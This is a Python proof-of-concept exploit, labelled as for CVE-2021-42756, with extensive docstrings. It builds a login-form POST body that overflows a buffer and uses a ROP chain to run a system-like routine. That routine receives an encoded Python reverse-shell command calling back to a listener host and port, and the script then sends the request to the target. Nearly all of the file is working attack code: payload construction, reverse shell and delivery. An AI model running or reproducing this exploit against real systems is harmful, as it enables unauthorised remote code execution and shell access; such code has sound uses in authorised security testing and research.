import socket

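def dissolve_str(input_s: str) -> bytes:
    """Encode *input_s* with the PoC's fixed two-bytes-per-character substitution.

    Every character in the range 0x20..0x7f is replaced by the byte pair found
    at ``dslv_map[ord(ch) - 0x20]``; the table is a static lookup reproduced
    verbatim from the PoC. What the target does with the encoded form is not
    visible in this file — judging by the field name it is fed into
    (``mitb_password_hidden``) it is presumably the transformation the login
    form applies to the password client-side; TODO confirm against the target.

    Args:
        input_s: text to encode. Every character must lie in 0x20..0x7f.

    Returns:
        The encoded text as ``bytes``, exactly ``2 * len(input_s)`` long
        (empty input gives ``b''``).

    Raises:
        ValueError: if a character is outside 0x20..0x7f. The original looked
            the index up unchecked: a control character such as ``'\\n'``
            produced a negative index and silently picked an entry from the
            *end* of the table, and a non-ASCII character raised a bare
            ``IndexError`` — both yielded a corrupted payload instead of a
            clear error at the point where the command is built.
    """
    # Index 0 is ' ' (0x20), index 95 is DEL (0x7f). The table is five runs of
    # consecutive low bytes under a fixed high byte: 0x79/0x57..0x76,
    # 0x5b/0x30..0x33, 0x7b/0x7b..0x7e, 0x7b/0x3f..0x60, 0x4d/0x41..0x56.
    dslv_map = [(0x79,0x57),(0x79,0x58),(0x79,0x59),(0x79,0x5a),
        (0x79,0x5b),(0x79,0x5c),(0x79,0x5d),(0x79,0x5e),
        (0x79,0x5f),(0x79,0x60),(0x79,0x61),(0x79,0x62),
        (0x79,0x63),(0x79,0x64),(0x79,0x65),(0x79,0x66),
        (0x79,0x67),(0x79,0x68),(0x79,0x69),(0x79,0x6a),
        (0x79,0x6b),(0x79,0x6c),(0x79,0x6d),(0x79,0x6e),
        (0x79,0x6f),(0x79,0x70),(0x79,0x71),(0x79,0x72),
        (0x79,0x73),(0x79,0x74),(0x79,0x75),(0x79,0x76),
        (0x5b,0x30),(0x5b,0x31),(0x5b,0x32),(0x5b,0x33),
        (0x7b,0x7b),(0x7b,0x7c),(0x7b,0x7d),(0x7b,0x7e),
        (0x7b,0x3f),(0x7b,0x40),(0x7b,0x41),(0x7b,0x42),
        (0x7b,0x43),(0x7b,0x44),(0x7b,0x45),(0x7b,0x46),
        (0x7b,0x47),(0x7b,0x48),(0x7b,0x49),(0x7b,0x4a),
        (0x7b,0x4b),(0x7b,0x4c),(0x7b,0x4d),(0x7b,0x4e),
        (0x7b,0x4f),(0x7b,0x50),(0x7b,0x51),(0x7b,0x52),
        (0x7b,0x53),(0x7b,0x54),(0x7b,0x55),(0x7b,0x56),
        (0x7b,0x57),(0x7b,0x58),(0x7b,0x59),(0x7b,0x5a),
        (0x7b,0x5b),(0x7b,0x5c),(0x7b,0x5d),(0x7b,0x5e),
        (0x7b,0x5f),(0x7b,0x60),(0x4d,0x41),(0x4d,0x42),
        (0x4d,0x43),(0x4d,0x44),(0x4d,0x45),(0x4d,0x46),
        (0x4d,0x47),(0x4d,0x48),(0x4d,0x49),(0x4d,0x4a),
        (0x4d,0x4b),(0x4d,0x4c),(0x4d,0x4d),(0x4d,0x4e),
        (0x4d,0x4f),(0x4d,0x50),(0x4d,0x51),(0x4d,0x52),
        (0x4d,0x53),(0x4d,0x54),(0x4d,0x55),(0x4d,0x56)]

    encoded = bytearray()
    for ch in input_s:
        idx = ord(ch) - 0x20
        # Reject both sides of the range explicitly: a negative index would
        # otherwise wrap around to the tail of the table without an error.
        if not 0 <= idx < len(dslv_map):
            raise ValueError(
                f'character {ch!r} (0x{ord(ch):02x}) is outside the '
                f'encodable range 0x20..0x7f'
            )
        encoded.extend(dslv_map[idx])
    # All table values are < 0x80, so this equals the original
    # ``str.encode()`` of the same characters byte for byte.
    return bytes(encoded)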
    

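def craft_payload(*, base: int = 0x555555554000,
                  lhost: str = '192.168.1.30', lport: int = 12345) -> bytes:
    """Build the POST body that overflows the login handler and runs a ROP chain.

    The body is ``username=r00t&mitb_password_hidden=<blob>``. Every value in
    the blob is written as ASCII hex, two characters per byte, little-endian —
    so the target appears to hex-decode the field before copying it (TODO
    confirm; this is inferred from the ``*2`` on the padding and from the
    addresses being emitted as hex text rather than raw bytes). In decoded
    terms the blob is:

      * 0x400 bytes of ``'A'`` padding, then 8 bytes of ``'B'`` (presumably
        the saved frame pointer — not visible from here),
      * the return address and chain: ``push rsp; pop rax; ret`` (rax = rsp),
        ``pop rdi; ret`` with the constant 0x20, then
        ``add rdi, rax; cmp rdx, rdi; setae al; ret`` so rdi = rsp + 0x20,
        and finally ``addr_sys`` (by its name a ``system``-like routine),
      * the reverse-shell command, encoded with ``dissolve_str``, which the
        chain intends rdi to point at when ``addr_sys`` is entered.

    Gadget offsets are relative to the PIE base of one specific target build
    and are only meaningful for that build; ``base`` is the PIE base with
    ASLR disabled, which the PoC assumes. Nothing here is version-detected.

    Args:
        base: load address the gadget offsets are added to.
        lhost: IP the reverse shell connects back to.
        lport: TCP port of the listener on ``lhost``.

    Returns:
        The complete request body as ``bytes``. With the defaults it is
        byte-identical to the original hard-coded payload.

    Raises:
        ValueError: propagated from ``dissolve_str`` if the command contains a
            character the encoding cannot represent (e.g. a stray newline).
    """
    def _hex_le(value: int) -> bytes:
        # 8-byte little-endian word as 16 ASCII hex digits (same output as the
        # original's manual "format, pair up, reverse" dance).
        return value.to_bytes(8, 'little').hex().encode()

    g_00 = 0x000000000011bbd0           # push rsp ; pop rax ; ret
    g_01 = 0x000000000011aad5           # pop rdi ; ret
    g_02 = 0x00000000008e14e5           # add rdi, rax ; cmp rdx, rdi ; setae al ; ret
    addr_sys = 0x1179a0

    cmd = (
        "/bin/python -c 'import socket,sys,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        f"s.connect((\"{lhost}\",{lport}));"
        "[os.dup2(s.fileno(),x) for x in range(3)];"
        "os.execl(\"/bin/sh\",\"sh\");'"
    )

    return b''.join([
        b'username=r00t&mitb_password_hidden=',
        b'A' * 0x400 * 2,                   # 0x400 bytes once hex-decoded
        b'B' * 8 * 2,                       # 8 bytes
        _hex_le(base + g_00),               # ret -> rax = rsp
        _hex_le(base + g_01),               # pop rdi
        b'2000000000000000',                # rdi = 0x20 (LE hex of 0x20)
        _hex_le(base + g_02),               # rdi += rax -> rsp + 0x20
        _hex_le(base + addr_sys),           # call target with rdi = cmd
        dissolve_str(cmd),
    ])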


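def trigger_vuln(*, target: tuple[str, int] = ('192.168.1.10', 80),
                 timeout: float = 10.0) -> bool:
    """Send the crafted POST to ``/dvwa/login.php`` on the target.

    This is the fire-and-forget step of the PoC: one HTTP/1.1 POST whose body
    is ``craft_payload()``. The response is deliberately not read — success is
    observed out of band, by the reverse shell connecting back to the listener
    the payload names (see ``craft_payload``).

    Args:
        target: ``(host, port)`` of the vulnerable service. The host is also
            written into the ``Host`` header, which the original hard-coded.
        timeout: connect/send timeout in seconds so a filtered port does not
            hang the script forever (the original socket had no timeout).

    Returns:
        ``True`` when the whole request was handed to the kernel, ``False`` on
        any socket error. The original swallowed *every* exception with a bare
        ``except: pass`` (including ``KeyboardInterrupt``) and never closed the
        socket, so a refused or filtered port looked exactly like success.
    """
    print('[>] PoC for CVE-2021-42756')

    host, port = target
    payload = craft_payload()
    request = b''.join([
        b'POST /dvwa/login.php HTTP/1.1\r\n',
        b'Host: ' + host.encode() + b'\r\n',
        b'Content-Length: ' + str(len(payload)).encode() + b'\r\n',
        b'\r\n',
        payload,
    ])

    try:
        # The context manager closes the socket even if sendall() raises.
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
    except OSError as exc:
        print(f'[!] could not deliver payload to {host}:{port}: {exc}')
        return False

    print(f'[+] payload sent to {host}:{port} ({len(payload)} body bytes)')
    return True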

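# Only fire when run as a script, so the encoder and payload builder can be
# imported and inspected (or unit-tested) without sending anything.
if __name__ == '__main__':
    trigger_vuln()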